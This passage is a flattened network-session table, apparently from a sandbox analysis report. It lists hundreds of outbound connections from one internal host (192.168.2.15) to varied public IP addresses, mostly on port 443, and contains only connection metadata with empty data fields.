                                            13858192.168.2.1535118128.220.48.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13859192.168.2.1549716205.193.204.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13860192.168.2.1548108119.220.53.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13861192.168.2.155224286.206.191.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13862192.168.2.1554194107.135.150.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13863192.168.2.153446868.96.57.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13864192.168.2.1537334125.78.105.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13865192.168.2.1550718193.93.129.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13866192.168.2.154189676.83.168.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13867192.168.2.153597688.117.227.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13868192.168.2.1537600147.90.13.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13869192.168.2.1542728114.69.55.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13870192.168.2.1556500137.243.51.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13871192.168.2.1557960204.1.12.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13872192.168.2.1559530119.73.176.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13873192.168.2.1555768194.66.162.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13874192.168.2.1554114118.142.167.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13875192.168.2.1555598109.238.142.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13876192.168.2.1558592138.58.116.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13877192.168.2.1555872195.43.112.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13878192.168.2.153281461.233.209.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13879192.168.2.1538804200.206.135.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13880192.168.2.1539662164.25.236.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13881192.168.2.1555980209.8.94.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13882192.168.2.155509425.119.32.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13883192.168.2.154470043.203.162.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13884192.168.2.1537388134.113.233.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13885192.168.2.1542730124.108.87.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13886192.168.2.1544562101.55.101.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13887192.168.2.1552448206.49.109.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13888192.168.2.1560268200.65.141.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13889192.168.2.15407445.13.170.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13890192.168.2.1536212221.55.102.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13891192.168.2.1547374222.103.34.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13892192.168.2.1552014206.160.71.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13893192.168.2.1553882151.253.176.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13894192.168.2.1545156192.131.250.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13895192.168.2.154985052.89.17.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13896192.168.2.1545792116.227.20.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13897192.168.2.155492090.39.71.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13898192.168.2.153748695.86.105.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13899192.168.2.155240039.114.212.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13900192.168.2.1537606198.225.201.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13901192.168.2.153380836.195.188.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13902192.168.2.1542866208.89.232.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13903192.168.2.1552034164.43.91.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13904192.168.2.1534540199.170.12.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13905192.168.2.1552946128.9.228.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13906192.168.2.154821623.78.237.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13907192.168.2.1548480159.73.170.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13908192.168.2.1539140219.203.77.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13909192.168.2.153582461.171.166.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13910192.168.2.1555294105.41.165.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13911192.168.2.1559732179.218.104.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13912192.168.2.155158662.94.238.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13913192.168.2.1560736167.255.211.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13914192.168.2.154436440.45.18.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13915192.168.2.154749853.33.132.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13916192.168.2.1558776131.132.77.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13917192.168.2.154476872.88.227.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13918192.168.2.1544594104.71.81.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13919192.168.2.1541748223.68.131.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13920192.168.2.155550481.135.222.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13921192.168.2.1549032142.231.206.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13922192.168.2.1553416194.186.236.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13923192.168.2.1553172103.139.213.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13924192.168.2.155186645.162.73.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13925192.168.2.1556644199.51.5.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13926192.168.2.1542772124.249.0.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13927192.168.2.1555060104.161.215.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13928192.168.2.1535572112.246.197.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13929192.168.2.1548386133.238.173.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13930192.168.2.1554608102.54.40.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13931192.168.2.1540780194.91.101.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13932192.168.2.154520645.148.5.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13933192.168.2.1553262202.57.139.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13934192.168.2.1551410145.30.119.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13935192.168.2.153305494.102.234.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13936192.168.2.155256217.44.93.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13937192.168.2.1555574191.9.89.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13938192.168.2.1540638154.121.152.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13939192.168.2.156023085.167.75.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13940192.168.2.1542280204.52.250.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13941192.168.2.153559019.41.53.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13942192.168.2.1540476106.157.79.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13943192.168.2.1555416140.106.137.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13944192.168.2.1544320106.157.151.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13945192.168.2.156094679.191.49.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13946192.168.2.1541424157.37.211.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13947192.168.2.1551754199.131.149.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13948192.168.2.155297880.146.107.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13949192.168.2.1549582135.103.155.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13950192.168.2.155965489.241.161.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13951192.168.2.1551986104.175.80.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13952192.168.2.155934066.29.57.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13953192.168.2.1551692204.129.218.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13954192.168.2.15445121.151.223.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13955192.168.2.154109273.99.225.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13956192.168.2.1537996102.255.41.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13957192.168.2.155610412.78.186.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13958192.168.2.154175224.255.38.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13959192.168.2.1535794200.140.222.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13960192.168.2.15455008.72.164.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13961192.168.2.1558480209.97.9.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13962192.168.2.1533190172.245.152.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13963192.168.2.1538638209.10.181.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13964192.168.2.1539178188.16.168.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13965192.168.2.153505424.226.70.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13966192.168.2.1541778124.5.73.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13967192.168.2.154230645.46.112.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13968192.168.2.1556670129.230.41.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13969192.168.2.1556732218.220.180.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13970192.168.2.1556038170.101.85.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13971192.168.2.154771870.177.8.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13972192.168.2.1555068180.230.48.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13973192.168.2.155895218.0.59.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13974192.168.2.1559242189.255.82.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13975192.168.2.1548706209.53.24.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13976192.168.2.155201481.161.108.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13977192.168.2.1560876188.70.242.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13978192.168.2.153961842.93.231.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13979192.168.2.1549462156.255.6.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13980192.168.2.155748035.100.46.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13981192.168.2.1539584155.223.209.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13982192.168.2.1553716156.184.27.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13983192.168.2.1555832133.154.172.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13984192.168.2.1555176100.236.170.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13985192.168.2.154245258.216.89.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13986192.168.2.154720480.153.242.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13987192.168.2.1537450155.85.112.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13988192.168.2.155829683.49.21.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13989192.168.2.1555686185.253.160.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13990192.168.2.1558686184.166.191.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13991192.168.2.1536808104.159.222.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13992192.168.2.15423208.114.61.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13993192.168.2.153468037.138.169.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13994192.168.2.1559184200.184.4.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13995192.168.2.1557020205.92.229.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13996192.168.2.1538544219.103.84.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13997192.168.2.155542617.105.169.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13998192.168.2.1544708106.227.61.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13999192.168.2.153313823.160.34.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14000192.168.2.155566079.67.204.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14001192.168.2.1549734182.41.91.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14002192.168.2.1546862190.82.6.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14003192.168.2.1551898205.182.215.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14004192.168.2.1542300121.81.208.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14005192.168.2.155466676.125.234.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14006192.168.2.1546748144.4.234.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14007192.168.2.1548014166.164.174.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14008192.168.2.155480271.234.36.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14009192.168.2.1552976114.64.8.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14010192.168.2.1540410163.240.38.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14011192.168.2.1558712120.83.246.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14012192.168.2.154476676.53.193.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14013192.168.2.1555828173.184.77.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14014192.168.2.156029034.211.116.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14015192.168.2.154442495.104.110.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14016192.168.2.153395439.179.150.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14017192.168.2.1534332105.60.70.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14018192.168.2.1550138191.83.226.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14019192.168.2.1541166189.227.146.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14020192.168.2.1548592141.13.156.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14021192.168.2.1538482172.143.125.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14022192.168.2.1558752141.36.217.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14023192.168.2.155999686.168.252.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14024192.168.2.15388442.251.81.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14025192.168.2.153944068.127.172.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14026192.168.2.155209824.120.45.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14027192.168.2.154472812.136.7.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14028192.168.2.1540786115.82.91.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14029192.168.2.1537076121.224.166.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14030192.168.2.1550262153.28.71.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14031192.168.2.1545830143.233.3.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14032192.168.2.15393042.73.226.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14033192.168.2.1534588162.84.204.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14034192.168.2.1558270130.98.248.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14035192.168.2.154981632.8.143.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14036192.168.2.153757060.148.68.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14037192.168.2.1554610183.51.165.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14038192.168.2.154894490.142.159.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14039192.168.2.155827488.95.191.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14040192.168.2.1548588129.106.23.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14041192.168.2.1553142155.231.203.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14042192.168.2.154907452.106.19.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14043192.168.2.155663838.38.185.2078080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14044192.168.2.1556712198.43.221.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14045192.168.2.1538694158.2.134.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14046192.168.2.1534510116.75.193.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14047192.168.2.1549774155.164.8.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14048192.168.2.155167078.194.217.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14049192.168.2.1545454155.22.226.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14050192.168.2.1548352158.168.153.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14051192.168.2.1553432163.237.224.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14052192.168.2.1549130161.131.20.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14053192.168.2.154497040.120.221.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14054192.168.2.1559688144.207.133.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14055192.168.2.1554226101.43.231.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14056192.168.2.153498095.247.133.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14057192.168.2.1554832170.223.245.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14058192.168.2.1550650103.146.26.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14059192.168.2.1555474210.203.39.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14060192.168.2.155794852.221.235.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14061192.168.2.1560390151.83.246.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14062192.168.2.155827449.27.190.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14063192.168.2.153349294.50.161.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14064192.168.2.156088491.153.181.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14065192.168.2.1553738131.109.84.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14066192.168.2.1541188162.231.223.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14067192.168.2.155812865.243.173.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14068192.168.2.153870052.23.142.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14069192.168.2.1543038196.101.115.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14070192.168.2.1543536113.130.221.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14071192.168.2.1543148119.120.38.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14072192.168.2.1548132149.208.14.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14073192.168.2.155975872.27.243.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14074192.168.2.155647459.146.233.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14075192.168.2.155936872.100.241.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14076192.168.2.154331035.192.167.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14077192.168.2.154598094.37.252.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14078192.168.2.1558696129.125.21.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14079192.168.2.1548106217.13.20.164443
                                            TimestampBytes transferredDirectionData


